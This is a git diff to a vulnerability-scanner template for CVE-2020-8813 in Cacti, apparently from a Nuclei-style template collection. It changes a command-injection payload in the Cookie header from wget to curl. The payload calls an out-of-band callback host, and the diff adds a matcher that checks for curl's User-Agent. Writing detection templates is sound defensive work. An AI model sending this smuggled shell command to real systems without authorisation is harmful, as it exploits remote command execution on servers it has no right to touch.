diff --git a/cves/2020/CVE-2020-8813.yaml b/cves/2020/CVE-2020-8813.yaml index 2ca5f6ff4f..dc2df86a70 100644 --- a/cves/2020/CVE-2020-8813.yaml +++ b/cves/2020/CVE-2020-8813.yaml @@ -23,7 +23,7 @@ requests: - | GET /graph_realtime.php?action=init HTTP/1.1 Host: {{Hostname}} - Cookie: Cacti=%3Bwget%20http%3A//{{interactsh-url}} + Cookie: Cacti=%3Bcurl%20http%3A//{{interactsh-url}} matchers: - type: word @@ -31,4 +31,9 @@ requests: words: - "http" + - type: word + part: interactsh_request + words: + - "User-Agent: curl" + # Enhanced by mp on 2022/06/27